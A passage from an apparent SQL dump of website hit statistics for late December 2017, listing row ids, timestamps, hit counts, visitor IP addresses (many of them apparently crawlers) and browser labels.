9','firefox'),(190608,1514215951,1,1,0,0,'37.53.229.161','chrome'),(190609,1514216520,1,1,0,0,'178.154.171.88','other'),(190610,1514216633,1,0,1,0,'66.249.70.27',''),(190611,1514216853,1,1,0,0,'37.73.203.97','chrome'),(190612,1514216875,2,2,0,0,'141.8.142.74','other'),(190613,1514217089,1,1,0,0,'54.36.148.190','other'),(190614,1514217181,1,1,0,0,'207.46.13.12','other'),(190615,1514217720,1,1,0,0,'37.9.113.101','other'),(190616,1514217726,1,1,0,0,'37.9.113.138','other'),(190617,1514218757,2,2,0,0,'141.8.142.74','other'),(190618,1514218982,1,1,0,0,'87.250.224.46','other'),(190619,1514218987,1,1,0,0,'54.36.148.128','other'),(190620,1514219014,1,1,0,0,'66.249.64.28','chrome'),(190621,1514219095,1,1,0,0,'54.36.148.246','other'),(190622,1514219124,1,1,0,0,'78.111.185.169','chrome'),(190623,1514219389,1,1,0,0,'54.36.148.208','other'),(190624,1514219458,1,1,0,0,'54.36.149.61','other'),(190625,1514219550,1,1,0,0,'207.46.13.129','other'),(190626,1514219624,1,1,0,0,'178.154.171.88','other'),(190627,1514219886,1,1,0,0,'54.36.148.253','other'),(190628,1514220103,1,1,0,0,'54.36.149.44','other'),(190629,1514220238,1,1,0,0,'5.45.207.69','other'),(190630,1514220660,1,1,0,0,'54.36.149.61','other'),(190631,1514220867,1,1,0,0,'141.8.142.74','other'),(190632,1514221061,1,1,0,0,'54.36.148.50','other'),(190633,1514221205,1,1,0,0,'54.36.148.77','other'),(190634,1514221279,1,1,0,0,'91.196.178.66','chrome'),(190635,1514221752,1,1,0,0,'54.36.148.102','other'),(190636,1514222434,1,1,0,0,'92.112.118.131','chrome'),(190637,1514222772,1,1,0,0,'91.196.178.164','chrome'),(190638,1514223439,1,1,0,0,'54.36.149.102','other'),(190639,1514223444,1,1,0,0,'8.29.198.26','other'),(190640,1514223607,1,1,0,0,'54.36.148.252','other'),(190641,1514223769,1,1,0,0,'54.36.149.98','other'),(190642,1514223891,1,1,0,0,'54.36.148.72','other'),(190643,1514224152,1,1,0,0,'51.255.71.119','other'),(190644,1514224440,1,1,0,0,'54.36.148.30','other'),(190645,1514224522,2,2,0,0,'54.36.148.148','other'),(190646,1514224586,2,0,2,0,'66.249.64.30',''),(190647,1514224602,3,0,3,0,'66.249.64.28',''),(190648,1514224612,1,1,0,0,'54.36.149.27','other'),(190649,1514224920,1,1,0,0,'54.36.148.46','other'),(190650,1514225192,1,1,0,0,'54.36.149.57','other'),(190651,1514225385,1,1,0,0,'54.36.148.114','other'),(190652,1514225416,1,1,0,0,'54.36.149.26','other'),(190653,1514225717,1,1,0,0,'46.200.98.137','chrome'),(190654,1514225744,1,1,0,0,'54.36.148.80','other'),(190655,1514226611,1,1,0,0,'54.36.148.243','other'),(190656,1514226612,1,1,0,0,'178.154.171.88','other'),(190657,1514226623,1,1,0,0,'54.165.59.7','other'),(190658,1514226689,1,1,0,0,'54.36.148.132','other'),(190659,1514226697,1,1,0,0,'54.36.148.46','other'),(190660,1514226754,1,1,0,0,'157.55.39.101','other'),(190661,1514226757,1,1,0,0,'54.36.148.249','other'),(190662,1514226899,2,2,0,0,'141.8.142.74','other'),(190663,1514227296,1,1,0,0,'54.36.148.78','other'),(190664,1514227468,1,0,1,0,'66.249.70.29',''),(190665,1514227824,1,1,0,0,'54.36.148.140','other'),(190666,1514227854,1,1,0,0,'54.36.148.30','other'),(190667,1514227946,2,2,0,0,'54.36.149.6','other'),(190668,1514227969,1,1,0,0,'54.36.148.119','other'),(190669,1514228526,1,1,0,0,'54.36.148.57','other'),(190670,1514228663,1,1,0,0,'51.255.71.133','other'),(190671,1514228679,1,1,0,0,'54.36.149.81','other'),(190672,1514228722,1,1,0,0,'54.36.148.61','other'),(190673,1514229056,1,1,0,0,'37.9.113.182','other'),(190674,1514229401,1,1,0,0,'54.36.148.253','other'),(190675,1514229710,1,1,0,0,'54.36.148.72','other'),(190676,1514229905,1,1,0,0,'54.36.149.1','other'),(190677,1514230019,1,1,0,0,'54.36.149.51','other'),(190678,1514230030,1,0,1,0,'66.249.70.27',''),(190679,1514230113,1,1,0,0,'54.36.149.63','other'),(190680,1514230818,1,1,0,0,'178.154.171.88','other'),(190681,1514230885,1,1,0,0,'54.36.149.58','other'),(190682,1514231226,2,2,0,0,'54.36.149.0','other'),(190683,1514231255,1,1,0,0,'213.180.203.8','other'),(190684,1514231261,1,1,0,0,'54.36.148.125','other'),(190685,1514231481,1,1,0,0,'54.36.148.58','other'),(190686,1514231590,1,1,0,0,'54.36.149.16','other'),(190687,1514231623,1,1,0,0,'54.36.149.8','other'),(190688,1514231734,1,1,0,0,'80.252.155.198','chrome'),(190689,1514231782,1,1,0,0,'54.36.148.172','other'),(190690,1514231831,1,1,0,0,'54.36.148.135','other'),(190691,1514231928,1,1,0,0,'54.36.149.33','other'),(190692,1514232298,1,1,0,0,'141.8.132.19','other'),(190693,1514232517,1,1,0,0,'54.36.148.125','other'),(190694,1514233864,1,1,0,0,'54.36.148.114','other'),(190695,1514233971,1,1,0,0,'54.36.148.44','other'),(190696,1514233985,1,1,0,0,'54.36.148.11','other'),(190697,1514234069,1,0,1,0,'66.249.70.29',''),(190698,1514234270,1,1,0,0,'8.29.198.25','other'),(190699,1514234730,1,1,0,0,'54.36.149.19','other'),(190700,1514235063,1,1,0,0,'54.36.148.132','other'),(190701,1514235204,1,1,0,0,'54.36.148.231','other'),(190702,1514235353,1,1,0,0,'54.36.149.21','other'),(190703,1514235862,1,1,0,0,'66.249.64.28','chrome'),(190704,1514236397,1,1,0,0,'54.36.148.51','other'),(190705,1514236517,1,1,0,0,'54.36.148.63','other'),(190706,1514236561,1,1,0,0,'217.69.133.11','other'),(190707,1514236823,1,1,0,0,'141.8.142.74','other'),(190708,1514236999,1,1,0,0,'91.124.182.190','chrome'),(190709,1514237480,2,2,0,0,'54.36.148.232','other'),(190710,1514237493,1,1,0,0,'54.36.148.33','other'),(190711,1514237672,1,1,0,0,'54.36.148.85','other'),(190712,1514238001,1,1,0,0,'51.255.71.115','other'),(190713,1514238233,1,1,0,0,'54.36.148.193','other'),(190714,1514238315,1,1,0,0,'217.69.133.244','other'),(190715,1514238445,1,1,0,0,'54.36.148.255','other'),(190716,1514238918,1,1,0,0,'91.209.11.236','other'),(190717,1514238968,1,1,0,0,'54.36.148.23','other'),(190718,1514239112,1,1,0,0,'54.36.148.44','other'),(190720,1514239178,1,1,0,0,'54.36.149.22','other'),(190721,1514239340,1,1,0,0,'54.36.149.79','other'),(190722,1514239575,1,1,0,0,'54.36.149.28','other'),(190723,1514239841,1,1,0,0,'217.69.133.30','other'),(190724,1514239943,1,1,0,0,'51.255.71.133','other'),(190725,1514240302,1,1,0,0,'54.36.149.84','other'),(190726,1514240485,1,1,0,0,'138.68.82.133','chrome'),(190727,1514240688,1,1,0,0,'54.36.149.10','other'),(190728,1514240912,1,1,0,0,'54.36.148.47','other'),(190729,1514241144,1,1,0,0,'37.9.113.182','other'),(190730,1514241282,1,1,0,0,'54.36.148.208','other'),(190731,1514241696,1,1,0,0,'54.36.149.81','other'),(190732,1514241861,1,1,0,0,'54.36.149.97','other'),(190733,1514242047,1,1,0,0,'54.36.148.238','other'),(190734,1514242248,1,1,0,0,'54.36.148.106','other'),(190735,1514242267,1,1,0,0,'54.36.148.62','other'),(190736,1514242291,1,1,0,0,'54.36.148.235','other'),(190737,1514242465,1,1,0,0,'54.36.149.10','other'),(190738,1514242669,1,1,0,0,'54.36.148.167','other'),(190739,1514242811,1,1,0,0,'54.36.148.229','other'),(190740,1514242841,1,1,0,0,'51.255.71.133','other'),(190741,1514243045,1,1,0,0,'144.76.19.144','other'),(190742,1514243498,1,1,0,0,'54.36.148.174','other'),(190743,1514243524,1,1,0,0,'54.36.149.27','other'),(190744,1514243685,1,1,0,0,'178.154.171.88','other'),(190745,1514244368,1,1,0,0,'54.36.148.59','other'),(190746,1514244437,1,1,0,0,'54.36.148.189','other'),(190747,1514244460,1,1,0,0,'54.36.148.172','other'),(190748,1514244634,1,1,0,0,'54.36.148.104','other'),(190749,1514244695,1,0,1,0,'66.249.70.29',''),(190750,1514244896,1,1,0,0,'54.36.149.74','other'),(190751,1514245088,1,1,0,0,'8.29.198.25','other'),(190752,1514245194,1,1,0,0,'51.255.71.127','other'),(190753,1514245213,1,1,0,0,'54.36.148.26','other'),(190754,1514245233,1,1,0,0,'207.46.13.12','other'),(190755,1514245367,1,1,0,0,'51.255.71.113','other'),(190756,1514245689,1,1,0,0,'54.36.148.12','other'),(190757,1514246305,1,1,0,0,'157.55.39.101','other'),(190758,1514246636,1,1,0,0,'54.36.149.49','other'),(190759,1514246688,1,1,0,0,'54.36.148.181','other'),(190760,1514246690,1,1,0,0,'54.36.149.70','other'),(190761,1514246703,1,1,0,0,'54.36.149.40','other'),(190762,1514246766,1,1,0,0,'54.36.148.43','other'),(190763,1514247116,1,1,0,0,'54.36.148.18','other'),(190764,1514247185,2,2,0,0,'54.36.148.130','other'),(190765,1514247392,1,1,0,0,'54.36.149.34','other'),(190766,1514247437,1,1,0,0,'54.36.148.197','other'),(190767,1514247519,1,1,0,0,'54.36.149.26','other'),(190768,1514247563,1,1,0,0,'51.255.71.117','other'),(190769,1514247566,1,1,0,0,'54.36.148.105','other'),(190770,1514247697,1,1,0,0,'54.36.148.124','other'),(190771,1514247868,1,1,0,0,'54.36.148.102','other'),(190772,1514248014,1,1,0,0,'54.36.148.121','other'),(190773,1514248208,1,1,0,0,'207.46.13.12','other'),(190774,1514248301,1,1,0,0,'54.36.148.233','other'),(190775,1514248429,1,1,0,0,'54.36.148.130','other'),(190776,1514248474,1,1,0,0,'54.36.148.141','other'),(190777,1514248493,1,1,0,0,'54.36.149.28','other'),(190778,1514248637,1,1,0,0,'54.36.148.17','other'),(190779,1514248734,1,1,0,0,'54.36.148.129','other'),(190780,1514249122,1,1,0,0,'54.36.149.34','other'),(190781,1514249210,1,1,0,0,'54.36.148.19','other'),(190782,1514249254,1,1,0,0,'54.36.149.94','other'),(190783,1514249483,1,0,1,0,'66.249.70.27',''),(190784,1514249593,1,1,0,0,'54.36.149.46','other'),(190785,1514250049,1,1,0,0,'54.36.148.100','other'),(190786,1514250072,1,1,0,0,'87.250.224.46','other'),(190787,1514250079,1,1,0,0,'217.69.136.205','other'),(190788,1514250225,1,1,0,0,'51.255.71.121','other'),(190789,1514250386,1,1,0,0,'54.36.148.175','other'),(190790,1514250410,1,1,0,0,'217.69.133.232','other'),(190791,1514251073,1,1,0,0,'54.36.148.236','other'),(190792,1514251100,1,1,0,0,'54.36.148.190','other'),(190793,1514251882,1,1,0,0,'54.36.149.68','other'),(190794,1514252147,1,1,0,0,'54.36.149.72','other'),(190795,1514252266,1,1,0,0,'54.36.148.153','other'),(190796,1514252283,1,1,0,0,'54.36.149.43','other'),(190797,1514252620,1,1,0,0,'54.36.148.72','other'),(190798,1514253415,1,1,0,0,'54.36.148.121','other'),(190799,1514253893,1,1,0,0,'54.36.148.145','other'),(190800,1514254591,1,1,0,0,'51.255.71.117','other'),(190801,1514254945,1,1,0,0,'54.36.149.82','other'),(190802,1514255259,1,1,0,0,'54.36.149.96','other'),(190803,1514255297,1,1,0,0,'37.9.113.182','other'),(190804,1514255451,1,1,0,0,'54.36.148.177','other'),(190805,1514255671,1,1,0,0,'54.36.148.244','other'),(190806,1514255793,1,1,0,0,'54.36.148.18','other'),(190807,1514255913,1,1,0,0,'8.29.198.26','other'),(190808,1514256272,1,1,0,0,'54.36.148.65','other'),(190809,1514256774,1,1,0,0,'54.36.148.87','other'),(190810,1514256863,1,1,0,0,'54.36.148.124','other'),(190811,1514257050,1,1,0,0,'54.36.149.75','other'),(190812,1514257184,1,1,0,0,'54.36.148.98','other'),(190813,1514257556,1,1,0,0,'54.36.148.252','other'),(190814,1514257564,1,1,0,0,'54.36.148.91','other'),(190815,1514258038,1,1,0,0,'54.36.148.90','other'),(190816,1514258229,1,1,0,0,'54.36.149.53','other'),(190817,1514259012,1,1,0,0,'54.36.149.8','other'),(190818,1514259030,1,1,0,0,'54.36.148.233','other'),(190819,1514259042,1,1,0,0,'54.36.148.250','other'),(190820,1514259251,1,0,1,0,'66.249.70.27',''),(190821,1514260012,1,1,0,0,'54.36.148.164','other'),(190822,1514260073,1,1,0,0,'157.55.39.203','other'),(190823,1514260841,1,1,0,0,'54.36.148.14','other'),(190824,1514260929,1,1,0,0,'54.36.148.151','other'),(190825,1514261074,1,1,0,0,'54.36.148.87','other'),(190826,1514261309,1,1,0,0,'54.36.148.207','other'),(190827,1514261368,1,1,0,0,'54.36.149.67','other'),(190828,1514261501,1,1,0,0,'54.36.148.133','other'),(190829,1514261513,1,1,0,0,'54.36.148.101','other'),(190830,1514261720,1,1,0,0,'54.36.149.32','other'),(190831,1514261907,1,1,0,0,'54.36.148.119','other'),(190832,1514262586,1,1,0,0,'54.36.148.126','other'),(190833,1514262934,1,1,0,0,'54.36.149.89','other'),(190834,1514263247,1,1,0,0,'54.36.149.32','other'),(190835,1514263402,1,1,0,0,'54.36.149.4','other'),(190836,1514264279,1,1,0,0,'51.255.71.121','other'),(190837,1514264787,1,1,0,0,'54.36.148.54','other'),(190838,1514264923,1,1,0,0,'54.36.148.70','other'),(190839,1514265197,1,1,0,0,'54.36.149.78','other'),(190840,1514265233,1,1,0,0,'54.36.148.51','other'),(190841,1514265562,1,1,0,0,'54.36.148.157','other'),(190842,1514265611,1,1,0,0,'54.36.148.113','other'),(190843,1514265785,1,1,0,0,'54.36.148.101','other'),(190844,1514265840,1,1,0,0,'54.36.148.198','other'),(190845,1514266072,1,1,0,0,'54.36.148.200','other'),(190846,1514266164,1,1,0,0,'54.36.148.128','other'),(190847,1514266221,1,1,0,0,'54.36.148.154','other'),(190848,1514266488,1,1,0,0,'54.36.148.206','other'),(190849,1514266673,1,1,0,0,'54.36.149.32','other'),(190850,1514266742,1,1,0,0,'8.29.198.27','other'),(190851,1514266948,1,1,0,0,'207.46.13.12','other'),(190852,1514267340,1,1,0,0,'54.36.148.131','other'),(190853,1514268556,1,1,0,0,'66.249.70.25','chrome'),(190854,1514268642,1,1,0,0,'207.46.13.12','other'),(190855,1514268856,1,1,0,0,'54.36.149.29','other'),(190856,1514268887,1,1,0,0,'54.36.148.82','other'),(190857,1514269432,1,1,0,0,'54.36.148.40','other'),(190858,1514269433,1,1,0,0,'54.36.148.67','other'),(190859,1514269636,1,1,0,0,'54.36.148.38','other'),(190860,1514269693,1,1,0,0,'54.36.148.132','other'),(190861,1514270172,1,1,0,0,'54.36.149.85','other'),(190862,1514270179,1,1,0,0,'54.36.148.233','other'),(190863,1514270322,1,1,0,0,'54.36.148.241','other'),(190864,1514270546,1,1,0,0,'54.36.149.90','other'),(190865,1514270695,1,1,0,0,'157.55.39.203','other'),(190866,1514270770,1,1,0,0,'51.255.71.119','other'),(190867,1514271196,1,1,0,0,'51.255.71.121','other'),(190868,1514271302,1,1,0,0,'54.36.148.142','other'),(190869,1514271358,1,1,0,0,'91.196.177.46','firefox'),(190870,1514271469,1,1,0,0,'54.36.149.79','other'),(190871,1514271551,8,8,0,0,'69.30.226.234','other'),(190872,1514271656,1,1,0,0,'54.36.149.60','other'),(190873,1514271677,1,1,0,0,'54.36.149.68','other'),(190874,1514271849,1,1,0,0,'54.36.149.47','other'),(190875,1514272235,1,1,0,0,'54.36.149.53','other'),(190876,1514272616,1,1,0,0,'54.36.148.237','other'),(190877,1514272809,1,1,0,0,'54.36.148.204','other'),(190878,1514272823,1,1,0,0,'54.36.148.136','other'),(190879,1514272826,1,1,0,0,'54.36.148.147','other'),(190880,1514272974,1,1,0,0,'54.36.148.165','other'),(190881,1514273113,1,1,0,0,'54.36.148.238','other'),(190882,1514273528,1,1,0,0,'54.36.148.85','other'),(190883,1514273664,1,1,0,0,'54.36.148.177','other'),(190884,1514274051,1,1,0,0,'54.36.148.62','other'),(190885,1514274235,1,1,0,0,'54.36.148.10','other'),(190886,1514274574,1,1,0,0,'54.36.149.80','other'),(190887,1514274826,1,1,0,0,'54.36.148.135','other'),(190888,1514275004,1,1,0,0,'91.196.177.15','chrome'),(190889,1514275025,1,1,0,0,'54.36.148.74','other'),(190890,1514275247,1,1,0,0,'91.196.179.134','chrome'),(190891,1514275594,1,0,1,0,'66.249.70.27',''),(190892,1514275709,1,1,0,0,'51.255.71.132','other'),(190893,1514275767,1,1,0,0,'54.36.148.185','other'),(190894,1514276046,1,1,0,0,'91.196.178.72','chrome'),(190895,1514276087,1,1,0,0,'54.36.148.102','other'),(190896,1514276333,1,1,0,0,'91.196.178.135','chrome'),(190897,1514276355,1,1,0,0,'54.36.148.116','other'),(190898,1514276570,1,1,0,0,'185.41.21.130','chrome'),(190899,1514276598,1,1,0,0,'54.36.148.117','other'),(190900,1514276632,1,1,0,0,'54.36.148.92','other'),(190901,1514276683,1,1,0,0,'91.196.178.164','firefox'),(190902,1514276819,1,1,0,0,'91.196.178.167','chrome'),(190903,1514276911,1,1,0,0,'54.36.148.95','other'),(190904,1514277189,1,1,0,0,'54.36.148.24','other'),(190905,1514277441,1,1,0,0,'51.255.71.114','other'),(190906,1514277539,1,1,0,0,'217.69.133.72','other'),(190907,1514277567,1,1,0,0,'8.29.198.26','other'),(190908,1514277672,1,1,0,0,'54.36.148.205','other'),(190909,1514278009,1,1,0,0,'94.179.9.17','firefox'),(190910,1514278175,1,1,0,0,'54.36.148.171','other'),(190911,1514278404,1,1,0,0,'54.36.148.131','other'),(190912,1514278872,1,1,0,0,'54.36.149.4','other'),(190913,1514278973,1,1,0,0,'185.149.23.164','chrome'),(190914,1514279217,1,1,0,0,'54.36.149.100','other'),(190915,1514279289,2,2,0,0,'158.69.251.119','other'),(190916,1514279654,1,1,0,0,'54.36.148.94','other'),(190917,1514280148,1,1,0,0,'54.36.148.59','other'),(190918,1514280221,1,1,0,0,'54.36.148.165','other'),(190919,1514280344,1,1,0,0,'51.255.71.128','other'),(190920,1514280426,1,1,0,0,'54.36.148.137','other'),(190921,1514280459,1,1,0,0,'54.36.148.74','other'),(190922,1514280507,1,1,0,0,'91.196.178.68','chrome'),(190923,1514280527,1,1,0,0,'54.36.148.254','other'),(190924,1514280601,1,1,0,0,'95.132.63.168','firefox'),(190925,1514280605,2,2,0,0,'91.196.178.72','chrome'),(190926,1514280649,1,1,0,0,'54.36.149.91','other'),(190927,1514280867,1,0,1,0,'66.249.70.29',''),(190928,1514281004,1,1,0,0,'54.36.148.196','other'),(190929,1514281064,1,1,0,0,'54.36.148.16','other'),(190930,1514281250,1,1,0,0,'54.36.148.81','other'),(190931,1514281457,1,1,0,0,'54.36.148.136','other'),(190932,1514281643,1,1,0,0,'54.36.149.99','other'),(190933,1514281908,1,1,0,0,'54.36.148.253','other'),(190934,1514282020,1,1,0,0,'54.36.148.199','other'),(190935,1514282183,1,1,0,0,'54.36.149.39','other'),(190936,1514282381,1,1,0,0,'141.8.142.74','other'),(190937,1514282513,1,1,0,0,'51.255.71.117','other'),(190938,1514282815,1,1,0,0,'54.36.148.10','other'),(190939,1514283161,1,1,0,0,'54.36.148.61','other'),(190940,1514283187,1,1,0,0,'54.36.148.181','other'),(190941,1514283590,1,1,0,0,'54.36.148.251','other'),(190942,1514283899,1,1,0,0,'54.36.149.35','other'),(190943,1514283912,1,1,0,0,'54.36.148.100','other'),(190944,1514284080,1,1,0,0,'54.36.149.55','other'),(190945,1514284402,2,2,0,0,'54.36.149.74','other'),(190946,1514284681,1,1,0,0,'91.196.178.164','chrome'),(190947,1514284770,1,1,0,0,'54.36.148.51','other'),(190948,1514285467,1,1,0,0,'54.36.148.72','other'),(190949,1514285634,1,1,0,0,'54.36.148.124','other'),(190950,1514285645,1,1,0,0,'54.36.148.183','other'),(190951,1514285747,1,1,0,0,'54.36.148.178','other'),(190952,1514285970,1,1,0,0,'157.55.39.101','other'),(190953,1514285975,1,1,0,0,'54.36.148.44','other'),(190954,1514286003,1,1,0,0,'54.36.149.105','other'),(190955,1514286210,1,1,0,0,'54.36.148.105','other'),(190956,1514286713,1,1,0,0,'54.36.149.3','other'),(190957,1514286772,1,1,0,0,'51.255.71.126','other'),(190958,1514287004,1,1,0,0,'54.36.148.172','other'),(190959,1514287882,1,0,1,0,'66.249.70.25',''),(190960,1514287916,1,1,0,0,'54.36.148.178','other'),(190961,1514288036,1,1,0,0,'54.36.149.34','other'),(190962,1514288401,1,1,0,0,'8.29.198.26','other'),(190963,1514288412,1,0,1,0,'66.249.64.29',''),(190964,1514289239,1,1,0,0,'91.196.177.137','firefox'),(190965,1514289460,1,1,0,0,'91.196.178.66','firefox'),(190966,1514289536,1,1,0,0,'213.174.18.230','other'),(190967,1514290142,1,1,0,0,'54.36.149.9','other'),(190968,1514290223,1,1,0,0,'54.36.149.105','other'),(190969,1514290465,1,1,0,0,'54.36.148.128','other'),(190970,1514290628,1,1,0,0,'54.36.148.87','other'),(190971,1514290748,1,1,0,0,'130.180.218.19','chrome'),(190972,1514291389,1,1,0,0,'54.36.148.94','other'),(190973,1514291468,1,1,0,0,'54.36.148.14','other'),(190974,1514291492,1,1,0,0,'194.79.11.98','chrome'),(190975,1514291503,1,1,0,0,'178.154.171.88','other'),(190976,1514291643,1,1,0,0,'54.36.148.70','other'),(190977,1514292033,1,1,0,0,'54.36.149.26','other'),(190978,1514292496,1,1,0,0,'54.36.148.129','other'),(190979,1514292825,1,1,0,0,'178.95.226.65','firefox'),(190980,1514293020,1,1,0,0,'54.36.148.244','other'),(190981,1514293292,1,1,0,0,'46.201.135.53','firefox'),(190982,1514293368,1,1,0,0,'54.36.148.99','other'),(190983,1514293398,1,1,0,0,'54.36.148.61','other'),(190984,1514293750,1,1,0,0,'51.255.71.127','other'),(190985,1514293807,1,1,0,0,'54.36.148.104','other'),(190986,1514294048,1,1,0,0,'54.36.148.48','other'),(190987,1514294103,1,1,0,0,'54.36.149.29','other'),(190988,1514294627,1,1,0,0,'51.255.71.133','other'),(190989,1514294773,1,1,0,0,'54.36.149.71','other'),(190990,1514294846,1,1,0,0,'54.36.148.119','other'),(190991,1514295061,1,1,0,0,'207.46.13.12','other'),(190992,1514295150,1,1,0,0,'54.36.149.15','other'),(190993,1514295207,1,1,0,0,'54.36.149.100','other'),(190994,1514295296,1,1,0,0,'54.36.148.194','other'),(190995,1514295376,1,1,0,0,'91.196.178.167','chrome'),(190996,1514295750,1,1,0,0,'54.36.149.21','other'),(190997,1514295873,1,1,0,0,'54.36.149.9','other'),(190998,1514295921,1,1,0,0,'54.36.148.97','other'),(190999,1514295999,1,1,0,0,'54.36.148.250','other'),(191000,1514296033,1,1,0,0,'54.36.148.253','other'),(191001,1514296087,1,1,0,0,'54.36.148.140','other'),(191002,1514296189,1,1,0,0,'54.36.148.111','other'),(191003,1514296234,1,1,0,0,'178.93.230.40','msie'),(191004,1514296261,1,1,0,0,'199.58.86.211','other'),(191005,1514296272,1,1,0,0,'54.36.148.242','other'),(191006,1514296308,1,1,0,0,'54.36.149.85','other'),(191007,1514296425,1,1,0,0,'54.36.148.127','other'),(191008,1514296627,1,1,0,0,'54.36.149.42','other'),(191009,1514296881,1,1,0,0,'91.196.178.161','chrome'),(191010,1514296914,1,1,0,0,'54.36.149.59','other'),(191011,1514296966,1,1,0,0,'54.36.148.49','other'),(191012,1514297020,1,1,0,0,'46.200.96.89','firefox'),(191013,1514297344,1,1,0,0,'54.36.148.119','other'),(191014,1514297362,1,1,0,0,'54.36.149.70','other'),(191015,1514297562,1,1,0,0,'37.9.113.182','other'),(191016,1514297569,1,1,0,0,'54.36.149.75','other'),(191017,1514297680,1,1,0,0,'46.174.163.134','chrome'),(191018,1514297868,1,1,0,0,'54.36.149.58','other'),(191019,1514297944,1,1,0,0,'91.196.178.65','chrome'),(191020,1514298211,1,1,0,0,'54.36.148.106','other'),(191021,1514298633,1,1,0,0,'217.69.133.15','other'),(191022,1514298636,1,1,0,0,'217.69.133.12','other'),(191023,1514298922,1,1,0,0,'54.36.148.235','other'),(191024,1514298938,1,1,0,0,'54.36.148.33','other'),(191025,1514299126,1,1,0,0,'54.36.148.82','other'),(191026,1514299127,1,1,0,0,'95.133.27.162','chrome'),(191027,1514299229,1,1,0,0,'8.29.198.27','other'),(191028,1514299319,1,1,0,0,'54.36.149.101','other'),(191029,1514299456,1,1,0,0,'51.255.71.125','other'),(191030,1514299547,1,1,0,0,'207.46.13.129','other'),(191031,1514299755,1,1,0,0,'51.255.71.128','other'),(191032,1514299872,1,1,0,0,'141.8.142.74','other'),(191033,1514299876,1,1,0,0,'178.154.171.88','other'),(191034,1514299893,2,2,0,0,'37.54.95.214','chrome'),(191035,1514300150,1,1,0,0,'54.36.149.85','other'),(191036,1514300176,1,1,0,0,'87.250.224.46','other'),(191037,1514300404,1,1,0,0,'157.55.39.203','other'),(191038,1514300560,1,1,0,0,'54.36.148.187','other'),(191039,1514300590,1,1,0,0,'54.36.149.20','other'),(191040,1514300961,1,1,0,0,'54.36.148.60','other'),(191041,1514301102,1,1,0,0,'54.36.149.63','other'),(191042,1514301196,1,1,0,0,'54.36.149.75','other'),(191043,1514301241,1,1,0,0,'54.36.148.149','other'),(191044,1514301578,1,1,0,0,'54.36.148.20','other'),(191045,1514301630,1,1,0,0,'91.196.178.129','chrome'),(191046,1514301769,1,1,0,0,'54.36.148.172','other'),(191047,1514302119,1,1,0,0,'54.36.148.69','other'),(191048,1514302418,1,1,0,0,'54.36.149.101','other'),(191049,1514302432,2,2,0,0,'157.55.39.101','other'),(191050,1514302591,1,1,0,0,'51.255.71.116','other'),(191051,1514302669,1,1,0,0,'54.36.149.28','other'),(191052,1514302735,1,1,0,0,'54.36.149.37','other'),(191053,1514302868,1,1,0,0,'178.154.171.88','other'),(191054,1514302951,1,1,0,0,'54.36.148.66','other'),(191055,1514302972,1,1,0,0,'54.36.148.196','other'),(191056,1514303353,1,1,0,0,'54.36.149.15','other'),(191057,1514303386,1,1,0,0,'54.36.149.106','other'),(191058,1514303402,1,1,0,0,'54.36.149.43','other'),(191059,1514303624,1,1,0,0,'54.36.148.55','other'),(191060,1514303723,1,1,0,0,'54.36.148.147','other'),(191061,1514303764,1,0,1,0,'66.249.70.27',''),(191062,1514303955,1,1,0,0,'91.196.178.66','firefox'),(191063,1514306083,1,0,1,0,'66.249.64.30',''),(191064,1514306385,1,1,0,0,'207.46.13.129','other'),(191065,1514306388,1,1,0,0,'157.55.39.101','other'),(191066,1514309477,1,1,0,0,'54.36.149.82','other'),(191067,1514310052,1,1,0,0,'8.29.198.26','other'),(191068,1514310111,1,1,0,0,'54.36.148.230','other'),(191069,1514310195,1,1,0,0,'54.36.148.62','other'),(191070,1514310245,1,1,0,0,'54.36.148.33','other'),(191071,1514310473,1,1,0,0,'54.36.148.123','other'),(191072,1514310522,1,1,0,0,'54.36.149.9','other'),(191073,1514310526,1,1,0,0,'54.36.149.19','other'),(191074,1514310585,1,1,0,0,'54.36.148.246','other'),(191075,1514310686,1,1,0,0,'142.234.115.114','chrome'),(191076,1514311108,1,1,0,0,'54.36.148.107','other'),(191077,1514311188,1,1,0,0,'157.55.39.203','other'),(191078,1514311486,1,1,0,0,'107.167.108.247','other'),(191079,1514311705,1,1,0,0,'54.36.148.162','other'),(191080,1514311926,1,1,0,0,'54.36.148.122','other'),(191081,1514312004,1,1,0,0,'54.36.148.135','other'),(191082,1514312196,1,1,0,0,'54.36.148.114','other'),(191083,1514312533,1,1,0,0,'54.36.148.179','other'),(191084,1514312668,1,1,0,0,'157.55.39.101','other'),(191085,1514312853,1,1,0,0,'66.249.70.27','chrome'),(191086,1514312877,1,1,0,0,'54.36.148.102','other'),(191087,1514313015,1,1,0,0,'54.36.148.70','other'),(191088,1514313134,1,1,0,0,'54.36.149.3','other'),(191089,1514313270,1,1,0,0,'207.46.13.39','other'),(191090,1514313330,1,1,0,0,'54.36.149.103','other'),(191091,1514313552,1,1,0,0,'54.36.148.108','other'),(191092,1514313678,1,0,1,0,'66.249.64.29',''),(191093,1514313916,1,1,0,0,'54.36.149.21','other'),(191094,1514314041,1,1,0,0,'54.36.148.53','other'),(191095,1514314064,1,1,0,0,'54.36.148.250','other'),(191096,1514314141,1,1,0,0,'54.36.148.185','other'),(191097,1514314181,1,1,0,0,'54.36.148.236','other'),(191098,1514314760,1,1,0,0,'180.76.15.18','other'),(191099,1514314891,1,1,0,0,'91.196.178.165','chrome'),(191100,1514315186,1,1,0,0,'91.196.178.60','chrome'),(191101,1514315274,1,1,0,0,'54.36.149.41','other'),(191102,1514315341,1,1,0,0,'66.249.64.29','chrome'),(191103,1514315866,1,1,0,0,'54.36.149.44','other'),(191104,1514315869,1,1,0,0,'91.196.178.52','chrome'),(191105,1514316016,1,1,0,0,'54.36.148.68','other'),(191106,1514316447,1,1,0,0,'54.36.148.203','other'),(191107,1514316465,1,1,0,0,'54.36.148.76','other'),(191108,1514316650,1,1,0,0,'157.55.39.101','other'),(191109,1514316654,1,1,0,0,'157.55.39.203','other'),(191110,1514316797,1,1,0,0,'54.36.148.166','other'),(191111,1514317693,2,2,0,0,'78.111.186.20','chrome'),(191112,1514317827,1,1,0,0,'54.36.148.130','other'),(191113,1514318025,1,1,0,0,'54.36.148.245','other'),(191114,1514318168,1,1,0,0,'178.255.215.94','other'),(191115,1514318199,1,1,0,0,'157.55.39.203','other'),(191116,1514318314,1,1,0,0,'54.36.148.112','other'),(191117,1514318345,1,1,0,0,'217.69.133.193','other'),(191118,1514318546,1,1,0,0,'178.154.171.88','other'),(191119,1514318946,1,1,0,0,'207.46.13.129','other'),(191120,1514319261,1,1,0,0,'54.36.148.199','other'),(191121,1514319477,1,1,0,0,'54.36.149.47','other'),(191122,1514319508,1,1,0,0,'54.36.148.36','other'),(191123,